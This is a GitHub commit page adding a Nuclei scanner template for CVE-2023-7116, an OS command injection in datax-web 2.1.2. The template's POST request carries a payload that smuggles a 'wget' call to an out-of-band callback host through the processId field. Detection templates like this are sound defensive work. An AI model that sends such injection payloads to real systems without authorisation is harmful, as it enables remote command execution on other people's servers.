Skip to content

Commit a5b37aa

Browse files
Merge pull request #12420 from projectdiscovery/pussycat0x-patch-8
Create CVE-2023-7116.yaml
2 parents 9324681 + 4393ea0 commit a5b37aa

1 file changed

Lines changed: 58 additions & 0 deletions

File tree

http/cves/2023/CVE-2023-7116.yaml

Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
id: CVE-2023-7116
2+
3+
info:
4+
name: WeiYe-Jing datax-web <= 2.1.2 - OS Command Injection
5+
author: pussycat0x
6+
severity: medium
7+
description: |
8+
A vulnerability, which was classified as critical, has been found in WeiYe-Jing datax-web 2.1.2. Affected by this issue is some unknown functionality of the file /api/log/killJob of the component HTTP POST Request Handler. The manipulation of the argument processId leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-249086 is the identifier assigned to this vulnerability.
9+
reference:
10+
- https://vuldb.com/?ctiid.249086
11+
- https://vuldb.com/?id.249086
12+
classification:
13+
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
14+
cvss-score: 6.3
15+
cve-id: CVE-2023-7116
16+
cwe-id: CWE-78
17+
epss-score: 0.02848
18+
epss-percentile: 0.85599
19+
cpe: cpe:2.3:a:datax-web_project:datax-web:2.1.2:*:*:*:*:*:*:*
20+
metadata:
21+
vendor: datax-web_project
22+
product: datax-web
23+
tags: cve,cve2023,datax-web,oast,rce
24+
25+
flow: http(1) && http(2)
26+
27+
http:
28+
- raw:
29+
- |
30+
GET / HTTP/1.1
31+
Host: {{Hostname}}
32+
33+
matchers:
34+
- type: word
35+
part: body
36+
words:
37+
- "<title>Datax Web"
38+
internal: true
39+
40+
- raw:
41+
- |
42+
POST /api/log/killJob HTTP/1.1
43+
Host: {{Hostname}}
44+
Content-Type: application/json
45+
Accept: application/json
46+
47+
{"processId":"1 & wget http://{{interactsh-url}}"}
48+
49+
matchers-condition: and
50+
matchers:
51+
- type: word
52+
part: interactsh_protocol
53+
words:
54+
- "http"
55+
56+
- type: status
57+
status:
58+
- 200

0 commit comments

Comments
 (0)